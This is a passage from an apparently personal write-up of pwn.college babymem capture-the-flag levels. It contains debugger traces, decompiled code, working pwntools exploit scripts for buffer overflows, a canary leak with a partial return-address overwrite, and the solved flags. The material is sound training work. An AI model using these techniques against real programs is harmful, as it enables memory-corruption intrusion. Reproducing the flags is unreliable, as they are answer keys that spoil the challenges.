   0x55e7d6a8cd4c <challenge+222>    mov    rcx, qword ptr [rbp - 0x18]
   0x55e7d6a8cd50 <challenge+226>    mov    eax, dword ptr [rbp - 0x30]
   0x55e7d6a8cd53 <challenge+229>    mov    edx, 0x400                      EDX => 0x400
   0x55e7d6a8cd58 <challenge+234>    mov    rsi, rcx
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'
02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a90010
04:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...
05:0028│-038 0x7ffcf78305f8 —▸ 0x7044dd967c80 (putchar+240) ◂— jmp 0x7044dd967bd6
06:0030│-030 0x7ffcf7830600 ◂— 0x230
07:0038│-028 0x7ffcf7830608 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55e7d6a8cd2a challenge+188
   1   0x55e7d6a8d063 main+213
   2   0x7044dd90ae08
   3   0x7044dd90aecc __libc_start_main+140
   4   0x55e7d6a8c20e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> ni
50 collapsed lines
0x000055e7d6a8cd2f in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0x7044ddaff000 ◂— 0
 RBX  0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
*RCX  0x7044dd9fa24c (mmap64+44) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  3
 RDI  0
 RSI  0x1000
 R8   0
 R9   0
*R10  0x22
*R11  0x246
 R12  1
 R13  0
 R14  0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0
 RSP  0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
*RIP  0x55e7d6a8cd2f (challenge+193) ◂— mov qword ptr [rbp - 0x18], rax
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x55e7d6a8cd2a <challenge+188>    call   mmap@plt                    <mmap@plt>

 ► 0x55e7d6a8cd2f <challenge+193>    mov    qword ptr [rbp - 0x18], rax     [0x7ffcf7830618] => 0x7044ddaff000 ◂— 0
   0x55e7d6a8cd33 <challenge+197>    mov    esi, 0                          ESI => 0
   0x55e7d6a8cd38 <challenge+202>    lea    rdi, [rip + 0x1530]             RDI => 0x55e7d6a8e26f ◂— 0x67616c662f /* '/flag' */
   0x55e7d6a8cd3f <challenge+209>    mov    eax, 0                          EAX => 0
   0x55e7d6a8cd44 <challenge+214>    call   open@plt                    <open@plt>

   0x55e7d6a8cd49 <challenge+219>    mov    dword ptr [rbp - 0x30], eax
   0x55e7d6a8cd4c <challenge+222>    mov    rcx, qword ptr [rbp - 0x18]
   0x55e7d6a8cd50 <challenge+226>    mov    eax, dword ptr [rbp - 0x30]
   0x55e7d6a8cd53 <challenge+229>    mov    edx, 0x400                      EDX => 0x400
   0x55e7d6a8cd58 <challenge+234>    mov    rsi, rcx
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'
02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a90010
04:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...
05:0028│-038 0x7ffcf78305f8 —▸ 0x7044dd967c80 (putchar+240) ◂— jmp 0x7044dd967bd6
06:0030│-030 0x7ffcf7830600 ◂— 0x230
07:0038│-028 0x7ffcf7830608 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55e7d6a8cd2f challenge+193
   1   0x55e7d6a8d063 main+213
   2   0x7044dd90ae08
   3   0x7044dd90aecc __libc_start_main+140
   4   0x55e7d6a8c20e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p/x $rax
$1 = 0x7044ddaff000
pwndbg> c
Continuing.

Breakpoint 2, 0x000055e7d6a8ce04 in challenge ()
19 collapsed lines
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0x23
 RBX  0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
*RCX  0x22
 RDX  3
 RDI  0
*RSI  0x78
 R8   0
 R9   0
*R10  0
*R11  0x202
 R12  1
 R13  0
 R14  0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0
 RSP  0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
*RIP  0x55e7d6a8ce04 (challenge+406) ◂— call 0x55e7d6a8c150
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x55e7d6a8ce04 <challenge+406>    call   mmap@plt                    <mmap@plt>
        addr: 0
        len: 0x78
        prot: 3
        flags: 0x22
        fd: 0 (pipe:[532567])
        offset: 0
29 collapsed lines

   0x55e7d6a8ce09 <challenge+411>    mov    qword ptr [rbp - 0x10], rax
   0x55e7d6a8ce0d <challenge+415>    mov    rax, qword ptr [rbp - 0x10]
   0x55e7d6a8ce11 <challenge+419>    mov    rsi, rax
   0x55e7d6a8ce14 <challenge+422>    lea    rdi, [rip + 0x14cd]             RDI => 0x55e7d6a8e2e8 ◂— 'Called mmap(0, 120, PROT_READ|PROT_WRITE, MAP_PRIV...'
   0x55e7d6a8ce1b <challenge+429>    mov    eax, 0                          EAX => 0
   0x55e7d6a8ce20 <challenge+434>    call   printf@plt                  <printf@plt>

   0x55e7d6a8ce25 <challenge+439>    lea    rdi, [rip + 0x1508]     RDI => 0x55e7d6a8e334 ◂— 'Payload size: '
   0x55e7d6a8ce2c <challenge+446>    mov    eax, 0                  EAX => 0
   0x55e7d6a8ce31 <challenge+451>    call   printf@plt                  <printf@plt>

   0x55e7d6a8ce36 <challenge+456>    lea    rax, [rbp - 0x28]
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'
02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a90010
04:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...
05:0028│-038 0x7ffcf78305f8 ◂— 0x3dd967c80
06:0030│-030 0x7ffcf7830600 ◂— 0xffffffff
07:0038│-028 0x7ffcf7830608 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55e7d6a8ce04 challenge+406
   1   0x55e7d6a8d063 main+213
   2   0x7044dd90ae08
   3   0x7044dd90aecc __libc_start_main+140
   4   0x55e7d6a8c20e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> ni
51 collapsed lines
0x000055e7d6a8ce09 in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0x7044ddafb000 ◂— 0
 RBX  0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
*RCX  0x7044dd9fa24c (mmap64+44) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  3
 RDI  0
 RSI  0x78
 R8   0
 R9   0
*R10  0x22
*R11  0x246
 R12  1
 R13  0
 R14  0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0
 RSP  0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
*RIP  0x55e7d6a8ce09 (challenge+411) ◂— mov qword ptr [rbp - 0x10], rax
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x55e7d6a8ce04 <challenge+406>    call   mmap@plt                    <mmap@plt>

 ► 0x55e7d6a8ce09 <challenge+411>    mov    qword ptr [rbp - 0x10], rax     [0x7ffcf7830620] => 0x7044ddafb000 ◂— 0
   0x55e7d6a8ce0d <challenge+415>    mov    rax, qword ptr [rbp - 0x10]     RAX, [0x7ffcf7830620] => 0x7044ddafb000 ◂— 0
   0x55e7d6a8ce11 <challenge+419>    mov    rsi, rax                        RSI => 0x7044ddafb000 ◂— 0
   0x55e7d6a8ce14 <challenge+422>    lea    rdi, [rip + 0x14cd]             RDI => 0x55e7d6a8e2e8 ◂— 'Called mmap(0, 120, PROT_READ|PROT_WRITE, MAP_PRIV...'
   0x55e7d6a8ce1b <challenge+429>    mov    eax, 0                          EAX => 0
   0x55e7d6a8ce20 <challenge+434>    call   printf@plt                  <printf@plt>

   0x55e7d6a8ce25 <challenge+439>    lea    rdi, [rip + 0x1508]     RDI => 0x55e7d6a8e334 ◂— 'Payload size: '
   0x55e7d6a8ce2c <challenge+446>    mov    eax, 0                  EAX => 0
   0x55e7d6a8ce31 <challenge+451>    call   printf@plt                  <printf@plt>

   0x55e7d6a8ce36 <challenge+456>    lea    rax, [rbp - 0x28]
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'
02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a90010
04:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...
05:0028│-038 0x7ffcf78305f8 ◂— 0x3dd967c80
06:0030│-030 0x7ffcf7830600 ◂— 0xffffffff
07:0038│-028 0x7ffcf7830608 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55e7d6a8ce09 challenge+411
   1   0x55e7d6a8d063 main+213
   2   0x7044dd90ae08
   3   0x7044dd90aecc __libc_start_main+140
   4   0x55e7d6a8c20e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> dist $rax $1
0x7044ddafb000->0x7044ddaff000 is 0x4000 bytes (0x800 words)

Exploit

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-11-0"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
b *challenge+188
13
b *challenge+406
14
c
15
"""
16

17

18
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
19
    if local:
20
        elf = ELF(FILE)
21
        context.binary = elf
22

23
        if debug:
24
            return gdb.debug(
25
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
26
            )
27
        else:
28
            return process([elf.path] + (argv or []), env=envp)
29
    else:
30
        return remote(HOST, PORT)
31

32

33
padding = b"".ljust(0x4000, b"A")
34

35

36
def send_payload(target, payload):
37
    try:
38
        payload_size = f"{len(payload)}".encode()
39
        target.recvuntil(b"Payload size: ")
40
        target.sendline(payload_size)
41
        target.recvuntil(b"Send your payload")
42
        target.send(payload)
43

44
        response = target.recvall()
45

46
        return b"pwn.college{" in response
47
    except Exception as e:
48
        log.exception(f"An error occurred: {e}")
49

50

51
try:
52
    target = launch(debug=False)
53

54
    payload = padding
55

56
    if send_payload(target, payload):
57
        log.success("Success! Exiting...")
58

59
        pause()
60
        exit()
61
except Exception as e:
62
    log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{oNJmkkep5Mt0PwVQdAiStSjA960.0VOwMDL5cTNxgzW}

Level 11.1

Information

Category: Pwn

Description

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Write-up

和上题一样的哥……

Exploit

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-11-1"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
b *challenge+104
13
b *challenge+262
14
b *challenge+352
15
c
16
"""
17

18

19
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
20
    if local:
21
        elf = ELF(FILE)
22
        context.binary = elf
23

24
        if debug:
25
            return gdb.debug(
26
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
27
            )
28
        else:
29
            return process([elf.path] + (argv or []), env=envp)
30
    else:
31
        return remote(HOST, PORT)
32

33

34
padding = b"".ljust(0x4000, b"A")
35

36

37
def send_payload(target, payload):
38
    try:
39
        payload_size = f"{len(payload)}".encode()
40
        target.recvuntil(b"Payload size: ")
41
        target.sendline(payload_size)
42
        target.recvuntil(b"Send your payload")
43
        target.send(payload)
44

45
        response = target.recvall()
46

47
        return b"pwn.college{" in response
48
    except Exception as e:
49
        log.exception(f"An error occurred: {e}")
50

51

52
try:
53
    target = launch(debug=False)
54

55
    payload = padding
56

57
    if send_payload(target, payload):
58
        log.success("Success! Exiting...")
59

60
        pause()
61
        exit()
62
except Exception as e:
63
    log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{I5165He8SxPMM_8YzEz5DkzRZ1c.0FMxMDL5cTNxgzW}

Level 12.0

Information

Category: Pwn

Description

Defeat a stack canary in a PIE binary by utilizing a bug left in the binary.

Write-up


108 collapsed lines
1
__int64 __fastcall challenge(unsigned int a1, __int64 a2, __int64 a3)
2
{
3
  int *v3; // rax
4
  char *v4; // rax
5
  __int64 v6; // [rsp+0h] [rbp-60h] BYREF
6
  __int64 v7; // [rsp+8h] [rbp-58h]
7
  __int64 v8; // [rsp+10h] [rbp-50h]
8
  unsigned int v9; // [rsp+1Ch] [rbp-44h]
9
  int v10; // [rsp+2Ch] [rbp-34h]
10
  size_t nbytes; // [rsp+30h] [rbp-30h] BYREF
11
  void *buf; // [rsp+38h] [rbp-28h]
12
  _QWORD v13[2]; // [rsp+40h] [rbp-20h] BYREF
13
  char v14; // [rsp+50h] [rbp-10h]
14
  unsigned __int64 v15; // [rsp+58h] [rbp-8h]
15
  __int64 savedregs; // [rsp+60h] [rbp+0h] BYREF
16
  _UNKNOWN *retaddr; // [rsp+68h] [rbp+8h] BYREF
17

18
  v9 = a1;
19
  v8 = a2;
20
  v7 = a3;
21
  v15 = __readfsqword(0x28u);
22
  v13[0] = 0LL;
23
  v13[1] = 0LL;
24
  v14 = 0;
25
  buf = v13;
26
  nbytes = 0LL;
27
  puts("The challenge() function has just been launched!");
28
  sp_ = (__int64)&v6;
29
  bp_ = (__int64)&savedregs;
30
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v6) >> 3) + 2;
31
  rp_ = (__int64)&retaddr;
32
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
33
  DUMP_STACK(sp_, sz_);
34
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
35
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
36
  puts("including the saved base pointer and the saved return address, for a");
37
  printf("total of %d bytes.\n", 8 * sz_);
38
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
39
  puts("(\"above\" it in the stack are other local variables used by the function).");
40
  puts("Your input will be read into this buffer.");
41
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 17);
42
  puts("large input length, and thus overflow the buffer.\n");
43
  puts("In this level, there is no \"win\" variable.");
44
  puts("You will need to force the program to execute the win_authed() function");
45
  puts("by directly overflowing into the stored return address back to main,");
46
  printf(
47
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
48
    (const void *)rp_,
49
    rp_ - (_DWORD)buf);
50
  printf(
51
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
52
    rp_ - (_DWORD)buf + 8,
53
    17);
54
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 17);
55
  puts("and 8 that will overwrite the return address).\n");
56
  cp_ = bp_;
57
  cv_ = __readfsqword(0x28u);
58
  while ( *(_QWORD *)cp_ != cv_ )
59
    cp_ -= 8LL;
60
  puts("Because the binary is position independent, you cannot know");
61
  puts("exactly where the win_authed() function is located.");
62
  puts("This means that it is not clear what should be written into the return address.\n");
63
  printf("Payload size: ");
64
  __isoc99_scanf("%lu", &nbytes);
65
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
66
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
67
  printf(
68
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
69
    (char *)buf + nbytes,
70
    nbytes - 17);
71
  printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_);
72
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
73
  puts("Overwriting the entire return address is fine when we know");
74
  puts("the whole address, but here, we only really know the last three nibbles.");
75
  puts("These nibbles never change, because pages are aligned to 0x1000.");
76
  puts("This gives us a workaround: we can overwrite the least significant byte");
77
  puts("of the saved return address, which we can know from debugging the binary,");
78
  puts("to retarget the return to main to any instruction that shares the other 7 bytes.");
79
  puts("Since that last byte will be constant between executions (due to page alignment),");
80
  puts("this will always work.");
81
  puts("If the address we want to redirect execution to is a bit farther away from");
82
  puts("the saved return address, and we need to write two bytes, then one of those");
83
  puts("nibbles (the fourth least-significant one) will be a guess, and it will be");
84
  puts("incorrect 15 of 16 times.");
85
  puts("This is okay: we can just run our exploit a few times until it works");
86
  puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times).");
87
  puts("One caveat in this challenge is that the win_authed() function must first auth:");
88
  puts("it only lets you win if you provide it with the argument 0x1337.");
89
  puts("Speifically, the win_authed() function looks something like:");
90
  puts("    void win_authed(int token)");
91
  puts("    {");
92
  puts("      if (token != 0x1337) return;");
93
  puts("      puts(\"You win! Here is your flag: \");");
94
  puts("      sendfile(1, open(\"/flag\", 0), 0, 256);");
95
  puts("      puts(\"\");");
96
  puts("    }");
97
  puts(byte_3E5B);
98
  puts("So how do you pass the check? There *is* a way, and we will cover it later,");
99
  puts("but for now, we will simply bypass it! You can overwrite the return address");
100
  puts("with *any* value (as long as it points to executable code), not just the start");
101
  puts("of functions. Let's overwrite past the token check in win!\n");
102
  puts("To do this, we will need to analyze the program with objdump, identify where");
103
  puts("the check is in the win_authed() function, find the address right after the check,");
104
  puts("and write that address over the saved return address.\n");
105
  puts("Go ahead and find this address now. When you're ready, input a buffer overflow");
106
  printf(
107
    "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n",
108
    (const void *)rp_,
109
    rp_ - (_DWORD)buf);
110
  puts("with the correct value.\n");
111
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
112
  v10 = read(0, buf, nbytes);
113
  if ( v10 < 0 )
114
  {
115
    v3 = __errno_location();
24 collapsed lines
116
    v4 = strerror(*v3);
117
    printf("ERROR: Failed to read input -- %s!\n", v4);
118
    exit(1);
119
  }
120
  printf("You sent %d bytes!\n", v10);
121
  puts("Let's see what happened with the stack:\n");
122
  DUMP_STACK(sp_, sz_);
123
  puts("The program's memory status:");
124
  printf("- the input buffer starts at %p\n", buf);
125
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
126
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
127
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
128
  printf("- the canary is stored at %p.\n", (const void *)cp_);
129
  printf("- the canary value is now %p.\n", *(const void **)cp_);
130
  printf("- the address of win_authed() is %p.\n", win_authed);
131
  putchar(10);
132
  puts("If you have managed to overwrite the return address with the correct value,");
133
  puts("challenge() will jump straight to win_authed() when it returns.");
134
  printf("Let's try it now!\n\n");
135
  if ( (unsigned __int64)buf + v10 > rp_ + 2 )
136
  {
137
    puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address.");
138
    puts("         This can still work, because I told you the correct address to use for");
139
    puts("         this execution, but you should not rely on that information.");
140
    puts("         You can solve this challenge by only overwriting two bytes!");
141
    puts("         ");
142
  }
143
  printf("You said: %s\n", (const char *)buf);
144
  puts("This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()");
145
  puts("call to see the hidden backdoor!");
146
  if ( strstr((const char *)buf, "REPEAT") )
147
  {
148
    puts("Backdoor triggered! Repeating challenge()");
149
    return challenge(v9, v8, v7);
150
  }
151
  else
152
  {
153
    puts("Goodbye!");
3 collapsed lines
154
    return 0LL;
155
  }
156
}

虽说是一道蛮综合的题，不过我感觉不算难，就简单说说思路好了。这个程序的问题就在于我们可以提供任意输入溢出 buf，覆盖返回地址。但是这里有一个 canary 保护需要绕过。

我们注意到有一条 printf 会输出我们栈上的内容，那我们是不是可以填满整个 buf，直到 canary 为止？这样 printf 就会把 canary 泄漏出来。结合 printf 判断字符串结束的机制，以及 canary 固定以 \x00 结尾，我们需要用一个任意字符填上这个空，这样就把 canary 泄漏出来了。

strstr 函数的定义如下，它会从 haystack 中搜索 needle 第一次出现的位置，返回这个位置的指针。如果没匹配到，则返回 NULL。

1
// attributes: thunk
2
char *strstr(const char *haystack, const char *needle)
3
{
4
  return strstr(haystack, needle);
5
}

对于这个函数最好还知道：

如果 needle 是空字符串，则 strstr 总是返回 haystack 的指针。

strstr 是大小写敏感的，strcasestr 大小写不敏感。

还有 strchr 返回字符串中第一个匹配的字符的指针。memcmp 比较指定内存区域的内容，适用于更通用的场景，strstr 则是处理简单字符串匹配问题的实用工具，适用于无需高性能优化的场景。

说这些只是我觉得了解下说不定会有帮助，要是哪天比赛碰上了，到时候能不能查还说不准…… ~~（想起了乔布斯说的：美妙人生，把点连成线）~~

~~好吧，其实主要是 ChatGPT 都说了，那我可不得好好利用一下，啰嗦两句？xD~~

if ( strstr((const char *)buf, "REPEAT") ) 判断输入中是否包含 REPEAT，如果包含的话就会再次调用 challenge。因为是同一个进程再次调用 challenge，所以 canary 的值不会改变，这就让我们泄漏出来的 canary 派上用场了。

绕过这个 win_authed 检测没啥好说的了吧，返回地址重定位到内部代码块开始执行即可。


4 collapsed lines
1
void __fastcall win_authed(int a1)
2
{
3
  int *v1; // rax
4
  char *v2; // rax
5
  int *v3; // rax
6
  char *v4; // rax
7

8
  if ( a1 == 4919 )
9
  {
10
    puts("You win! Here is your flag:");
11
    flag_fd_5715 = open("/flag", 0);
12
    if ( flag_fd_5715 < 0 )
13
    {
22 collapsed lines
14
      v1 = __errno_location();
15
      v2 = strerror(*v1);
16
      printf("\n  ERROR: Failed to open the flag -- %s!\n", v2);
17
      if ( geteuid() )
18
      {
19
        puts("  Your effective user id is not 0!");
20
        puts("  You must directly run the suid binary in order to have the correct permissions!");
21
      }
22
      exit(-1);
23
    }
24
    flag_length_5716 = read(flag_fd_5715, &flag_5714, 0x100uLL);
25
    if ( flag_length_5716 <= 0 )
26
    {
27
      v3 = __errno_location();
28
      v4 = strerror(*v3);
29
      printf("\n  ERROR: Failed to read the flag -- %s!\n", v4);
30
      exit(-1);
31
    }
32
    write(1, &flag_5714, flag_length_5716);
33
    puts("\n");
34
  }
35
}

当时这题困扰住我的倒不是如何构造攻击链的问题，而是写 exp 的问题……脑子抽了企图在 return challenge(v9, v8, v7); 这里返回到 win_authed，但是这是写死在代码段的，而且权限是 r-xp，小小栈溢出岂能覆盖？后来发现整体思路还少了一步，应该是先触发一次后门泄漏 canary，然后第二次执行的时候就不需要触发后门了，直接覆盖 challenge 的返回地址就好了。

随便扯两句心里话吧。踩了不少坑，希望以后可以争取做到更严谨完善的分析。还有就是动态调试很重要哦～感觉自己多少还是有一点调试恐惧症 LMAO

Exploit

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, pause, process, random, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-12-0"
8
HOST, PORT = "pwn.college", 1337
9

10
gdbscript = """
11
b *challenge+1339
12
b *challenge+1821
13
c
14
"""
15

16

17
def to_hex_bytes(data):
18
    return "".join(f"\\x{byte:02x}" for byte in data)
19

20

21
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
22
    if local:
23
        elf = ELF(FILE)
24
        context.binary = elf
25

26
        if debug:
27
            return gdb.debug(
28
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
29
            )
30
        else:
31
            return process([elf.path] + (argv or []), env=envp)
32
    else:
33
        return remote(HOST, PORT)
34

35

36
backdoor = b"REPEAT "
37
backdoor_trigger = b"".ljust(0x12, b"A") + backdoor
38
padding_to_canary = b"".ljust(0x18, b"A")
39
padding_to_ret = b"".ljust(0x8, b"A")
40
fixed_offset = b"\xe0"
41
possible_bytes = [bytes([i]) for i in range(0x03, 0x103, 0x10)]
42

43

44
def send_payload(target, payload):
45
    try:
46
        payload_size = f"{len(payload)}".encode()
47

48
        target.sendlineafter(b"Payload size: ", payload_size)
49
        target.sendafter(b"Send your payload", payload)
50
    except Exception as e:
51
        log.exception(f"An error occurred while sending payload: {e}")
52

53

54
def leak_canary(target):
55
    try:
56
        send_payload(target, backdoor_trigger)
57
        target.recvuntil(backdoor)
58

59
        canary = b"\x00" + target.recv(0x7)
60
        log.success(f"Canary: {to_hex_bytes(canary)}")
61

62
        return canary
63
    except Exception as e:
64
        log.exception(f"An error occurred while leaking canary: {e}")
65

66

67
def construct_payload(target):
68
    canary = leak_canary(target)
69

70
    payload = padding_to_canary
71
    payload += canary
72
    payload += padding_to_ret
73
    payload += fixed_offset + random.choice(possible_bytes)
74

75
    return payload
76

77

78
def attack(target, payload):
79
    try:
80
        send_payload(target, payload)
81

82
        response = target.recvall()
83

84
        return b"pwn.college{" in response
85
    except Exception as e:
86
        log.exception(f"An error occurred while performing attack: {e}")
87

88

89
def main():
90
    while True:
91
        target = launch()
92

93
        try:
94
            payload = construct_payload(target)
95

96
            if attack(target, payload):
97
                log.success("Success! Exiting...")
98

99
                pause()
100
                exit()
101
            else:
102
                target.close()
103
                target = launch()
104
        except Exception as e:
105
            log.exception(f"An error occurred in main loop: {e}")
106

107

108
if __name__ == "__main__":
109
    main()

Flag

Flag: pwn.college{YkuEQhg7aejOObKgMu4MNlIgI-S.0VMxMDL5cTNxgzW}

Level 12.1

Information

Category: Pwn

Description

Defeat a stack canary in a PIE binary by utilizing a bug left in the binary.

Write-up

和上题一样啊，不说了。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, pause, process, random, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-12-1"
8
HOST, PORT = "pwn.college", 1337
9

10
gdbscript = """
11
b *challenge+298
12
c
13
"""
14

15

16
def to_hex_bytes(data):
17
    return "".join(f"\\x{byte:02x}" for byte in data)
18

19

20
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
21
    if local:
22
        elf = ELF(FILE)
23
